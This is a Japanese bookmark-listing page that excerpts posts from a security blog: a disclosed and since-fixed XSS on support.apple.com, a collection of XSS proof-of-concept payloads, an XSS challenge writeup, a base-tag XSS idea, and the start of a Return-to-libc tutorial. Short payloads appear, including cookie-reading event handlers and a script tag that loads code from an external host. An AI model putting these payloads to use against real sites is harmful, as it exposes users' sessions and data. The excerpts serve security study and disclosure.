サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
デスク環境を整える
nootropic.me
脆弱性”&’<<>\ Advent Calendar 2015 6日目の記事。 数カ月前、support.apple.comドメイン上でXSSを見つけ報告しました。 結構頑張ってalert出したXSSだったので紹介します。ちなみに修正されてから公開しているのでここに書いてある方法を今試しても再現しません。あしからず。 脆弱性が存在したのは以下のページです。(今は全く違うサイトになっています。) https://support.apple.com/kb/index?page=search&locale=en_US&product=&q=&src=support_site.kbase.search.searchresults 画像の様に入力フォームが存在します。 この検索フォームに「zzz」という適当な文字列を入力すると以下の様な内容のタグが生成されているのが分かります。 <a id="aos
2015/4/16(木):ページの一番下に追記を記述しました。 その昔、なんとかキャンプというセキュリティのイベントに参加した時「アウトプットが大事」と言われたのを思い出しました。 でも、普通自分の見つけた知識は後生大事に抱えておきたいもんだと思います。 そこで今回はそういった何かしょーもないものを捨てるべく、溜め込んだ色んなXSSのPoCを少し書き出してまとめました。 今まで自分で見つけたものや海外のSecurity Researcher達から収集したものもあります。 さて、今回リストアップしたPoCの見方ですがいくつかの項目があります。 一番上の「手法」はタイトルみたいなものだと思って下さい。 二番目の「PoC」はスクリプトを実行する為のコードです。殆どがアラートが出るだけのスクリプトの為危険なコードは無いつもりですがご自分のブラウザで実行する際は自己責任でお願いします。リンクをクリッ
タイトルに特に意味はありません。ヤマノススメでは主人公のあおいちゃんが好きです。 今回は某所で見つけたXSSチャレンジのwriteupでも書いてみようかと思います。 使用環境はMacのFirefox34.0(ブログ投稿時最新)でお送りします。 今回挑戦したのはこの問題です。 http://avlidienbrunn.se/xsschallenge/?xss=XSS%20me! 「xss」というクエリパラメータに何かストリングを入れてアラートを出せばいいんだと思います。XSSチャレンジは大抵そういうものです。 ただし、XSS対策が施されていてそれをかいくぐらないとアラートは出せないようです。 まずは適当なストリングをxssパラメータに与えてHTMLソースを観察してみようかと思います。 http://avlidienbrunn.se/xsschallenge/?xss=zzz”‘`><s>;/
最近面白いHTMLタグを知ったのでXSSに使えないかなーと思い色々考えてみました。 baseタグを使うことでベースURLを変更することが出来ます。 例えば以下の様なページがあります。 http://www.huga.com/[html] <html> <head> <meta charset="utf-8"> </head> <body> <base href="http://www.hoge.com"> <a href="test.html">test</a> </body> </html> [/html] この時、testをクリックすると開かれるページは「http://www.huga.com/test.html」ではなく「http://www.hoge.com/test.html」となります。 そこで以下の様なシナリオを考えてみます。 ユーザに一部のタグの使用が許されている以下の様な
XSSパターン(暫定版) XSSのパターンを幾つか集めてみました。出典は下の方にあります。 1.'';!--"<XSS>=&{()}``\" テスト文字列。まずはこの文字列を突っ込む。 2.<script>alert(1);</script> 単純なパターン 3."><script>alert(1);</script> 単純なパターン2 4.<script src=http://nootropic.me/xss.js></script> ダブルクォートやシングルクォートが使えない際 5.<ScrIpt>alert(1);</SCript> 単純にscriptタグが禁止されている際に使用出来る。他のタグでも使うことが出来る。 6.<a onmouseover="alert(document.cookie)">XSS</a> aタグを使用したXSS。 7.<a onmouseover=aler
今回はReturn-to-libcについて検証してみました。 Return-to-libcはスタック上でシェルコードの実行が禁止されていた場合の迂回策になります。 ところで管理人はよく「Return-to-libc」と「Return-into-libc」の2つを見かけるのですがどちらが正しいのでしょうか。 Return-to-libc:検索結果(217,000件) Return-into-libc:検索結果(91,600件) これだけで判断するのも愚かですが検索結果から見るとReturn-to-libcが正しいのでしょうか。本記事ではReturn-to-libcを採用したいと思います。 お膳立て ソースコード /*rtltest.c*/ #include <stdio.h> #include <string.h> void vuln(char *pass){ char buf[512];
このページを最初にブックマークしてみませんか?
『About - Nootropic.me』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く